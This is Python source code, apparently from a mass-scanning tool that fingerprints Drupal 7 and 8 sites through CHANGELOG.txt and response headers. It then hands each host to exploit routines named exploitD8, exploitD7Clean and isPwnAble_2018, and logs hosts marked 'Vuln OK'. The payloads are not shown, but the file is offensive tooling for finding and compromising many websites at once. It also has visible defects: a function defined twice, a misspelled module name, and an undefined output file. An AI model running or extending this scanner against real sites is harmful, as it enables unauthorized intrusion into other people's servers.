def checkVersion(host):
headers = util.genHeader()
timeout = 1
try:
# Request to CHANGELOG.txt of host
r = requests.post(host+"/CHANGELOG.txt",
verify=False, headers=headers, timeout=timeout)
# Case status code != 200
if(r.status_code != 200):
# Request to CHANGELOG.txt of host
r = requests.post(
host+"/core/CHANGELOG.txt", verify=False, headers=headers, timeout=timeout)
# Get data
data = r.text
except Exception as e:
return "N/A"
# Case check drupal
if "Drupal 1.0.0, 2001-01-15" in data and "<!doctype html>" not in data and "<!DOCTYPE html>" not in data:
check = True
sline = 0
while check:
try:
# Get newest version of drupal
data = r.text.split('\n')[sline]
except Exception as e:
check = False
if "Drupal" in data and "xxxx" not in data and "content=" not in data:
check = False
else:
sline = sline+1
return data
else:
return "N/A"
def processRedirectedURL(url, version):
# print 'Redirected ' + url
headers = ulti.genHeader()
form_id = '/user/password' if version[:1] == '7' else '/user/register'
if ('profile=default' in url):
return True
if('?q=' in url and version is '8'):
# print "Case q8"
return False
if('?q=user/password' in url and version is '7'):
# print "Case q7"
url = url[:-16]
return isPwnAbleWithQ(url)
if(form_id in url):
# print "Case form in url"
url = url[:-14]
if(version is '8'):
return exploitD8(url)
elif(version is '7'):
return exploitD7Clean(url)
else:
return False
res = requests.get(url, headers=headers, timeout=5)
if ('user_pass' not in res.text and 'user_form' not in res.text):
# print "Case brand new"
# return isVuln(url,version)
return False
return False
def checkHeader(host):
headers = util.genHeader()
timeout = 2
try:
r = requests.get(host, headers=headers, timeout=timeout)
if 'Drupal 7' in str(r.headers) and r.status_code == 200:
return "Drupal 7.xx"
if 'Drupal 8' in str(r.headers) and r.status_code == 200:
return "Drupal 8.xx"
except Exception as e:
print(e)
return "N/A"
return "N/A"
def isURLCached(url):
headers = util.genHeader()
timeout = 5
host = "http://" + url.strip()
try:
r = requests.get(host, headers=headers, timeout=timeout)
if 'Drupal 7' in str(r.headers) and r.status_code == 200:
with open(outputfile, 'a') as f:
f.write("%s Drupal 7\n" % url.strip())
if 'Drupal 8' in str(r.headers) and r.status_code == 200:
with open(outputfile, 'a') as f:
f.write("%s Drupal 8\n" % url.strip())
except Exception as e:
print(e)
def isVulnerable(lines):
headers = ulti.genHeader()
host = "http://" + lines.strip().split("|")[0] + "/"
# print host
version = lines.strip().split("|")[1]
formValid = isFormValid(host, version, headers)
if (formValid is True):
isPwned = isPwnAble_2018(host, version, headers)
if isPwned is True:
with open(outputfile, 'a') as f:
f.write("%s === Vuln OK === %s\n" %
(host.encode("utf-8"), version))
else:
with open(outputfile, 'a') as f:
f.write("%s === Vuln Fail ===\n" % host.encode("utf-8"))
elif (formValid is False):
with open(outputfile, 'a') as f:
f.write("%s === Form Fail ===\n" % host.encode("utf-8"))
else:
with open(outputfile, 'a') as f:
f.write("%s === Redirected === || %s \n" %
(host.encode("utf-8"), formValid))
def checkVersion(url):
# Get host as each line of input file
host = "http://"+url.strip()
# Get random user agent and set to header
headers = util.genHeader()
try:
# Request to CHANGELOG.txt of host
r = requests.post(host+"/CHANGELOG.txt",
verify=False, headers=headers, timeout=1)
# Case status code != 200
if(r.status_code != 200):
# Request to CHANGELOG.txt of host
r = requests.post(
host+"/core/CHANGELOG.txt", verify=False, headers=headers, timeout=1)
# Get data
data = r.text
except Exception as e:
data = ""
# Case check drupal
if "Drupal 1.0.0, 2001-01-15" in data and "<!doctype html>" not in data and "<!DOCTYPE html>" not in data:
check = True
sline = 0
while check:
try:
# Get newest version of drupal
data = r.text.split('\n')[sline]
except Exception as e:
check = False
if "Drupal" in data and "xxxx" not in data and "content=" not in data:
check = False
else:
sline = sline+1
# Concate to result
result = host+" "+data
# Open output file
with open(outputfile, 'a') as f:
# Write the result to file
f.write("%s\n" % result.encode("utf-8"))